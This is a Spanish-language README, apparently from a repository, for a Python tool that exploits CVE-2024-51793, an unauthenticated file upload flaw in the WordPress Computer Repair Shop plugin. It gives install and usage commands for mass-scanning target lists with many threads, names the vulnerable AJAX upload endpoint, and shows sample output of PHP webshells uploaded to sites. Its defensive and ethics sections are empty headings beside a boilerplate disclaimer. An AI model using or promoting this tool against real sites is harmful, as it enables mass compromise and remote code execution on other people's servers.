
Explota CVE-2024-51793, una carga arbitraria de archivos sin autenticación en el plugin Computer Repair Shop de WordPress, escanea listas de objetivos, sube webshells PHP y reporta sitios vulnerables.
Documentación de la herramienta de explotación CVE-2024-51793 📋 Resumen CVE-2024-51793 es una vulnerabilidad de carga de archivos arbitrarios sin autenticación en el plugin Computer Repair Shop para WordPress (versiones anteriores a la 3.8116). Esta vulnerabilidad permite a los atacantes cargar archivos arbitrarios, incluyendo webshells PHP, sin autenticación, lo que lleva a la ejecución remota de código en sitios WordPress vulnerables.
🚨 Detalles de la vulnerabilidad CVE ID: CVE-2024-51793
Tipo de vulnerabilidad: Carga de archivos arbitrarios sin autenticación
Plugin afectado: Computer Repair Shop WordPress Plugin
Versiones afectadas: < 3.8116
Nivel de riesgo: Crítico (Puntuación CVSS: 9.8)
🔧 Detalles técnicos La vulnerabilidad existe en el manejador de la acción wc_upload_file_ajax del plugin, que no valida correctamente los tipos de archivos ni la autenticación del usuario, permitiendo a atacantes no autenticados cargar archivos maliciosos directamente en el servidor.
📦 Instalación y requisitos Requisitos previos Python 3.6+
Paquetes requeridos: requests
Instalación bash
git clone cd cve-2024-51793-exploit
pip install requests
pip install -r requirements.txt 🛠️ Guía de uso Uso básico bash python3 cve_2024_51793_exploit.py -l targets.txt -t 50 Uso avanzado bash
python3 cve_2024_51793_exploit.py -l targets.txt -t 100 -o results
python3 cve_2024_51793_exploit.py -l urls.txt -t 50 --verbose Argumentos de línea de comandos
| Argumento | Corto | Descripción | Por defecto |
|---|---|---|---|
--list | -l | Ruta al archivo que contiene las URLs objetivo (requerido) | - |
--threads | -t | Número de hilos concurrentes | 50 |
--output | -o | Directorio de salida para los resultados | results |
Formato del archivo de entrada Cree un archivo de texto (targets.txt) con una URL por línea:
text example.com https://vulnerable-site.com http://192.168.1.100/wordpress test-site.org/blog 🔍 Cómo funciona
text /wp-content/plugins/computer-repair-shop/readme.txt 2. Detección de versión Verifica que el plugin contenga "CRM WordPress Plugin" y que la versión sea inferior a 3.8116.
text POST /wp-admin/admin-ajax.php?action=wc_upload_file_ajax 4. Payload de la webshell La webshell subida proporciona:
📊 Archivos de salida La herramienta genera dos archivos de salida principales:
vulnerable_targets.txt - Lista de URLs vulnerables confirmadaswebshells.txt - Lista de URLs de webshells subidas exitosamente🎯 Ejemplo de ejecución bash $ python3 cve_2024_51793_exploit.py -l targets.txt -t 30
╔══════════════════════════════════════════════════════════════╗
║ ║
║ CVE-2024-51793 Exploit Tool ║
║ Unauthenticated RCE in Computer Repair Shop WP Plugin ║
║ ║
╚══════════════════════════════════════════════════════════════╝
[ INFO ] Loaded 150 unique targets [ INFO ] Starting scan with 30 threads
[ SCANNING ] Checking: http://example.com/ [ VULNERABLE ] Target identified: http://example.com/ [ SUCCESS ] Shell uploaded: http://example.com/wp-content/uploads/2024/05/3287428974_ktn.php
[ SCANNING ] Checking: http://testsite.com/ [ NOT VULNERABLE ] Target: http://testsite.com/
[ COMPLETED ] Scan finished successfully 🛡️ Medidas defensivas Para propietarios de sitios web Acciones inmediatas:
Medidas preventivas:
Para investigadores de seguridad
⚠️ Consideraciones legales y éticas
🔄 Mantenimiento Actualizaciones Verifique regularmente:
Solución de problemas Problemas comunes y soluciones:
📞 Soporte
📚 Referencias
Descargo de responsabilidad: Esta herramienta debe usarse solo para investigación de seguridad legítima y pruebas de penetración autorizadas. Los autores no son responsables de ningún uso indebido o daño causado por esta herramienta.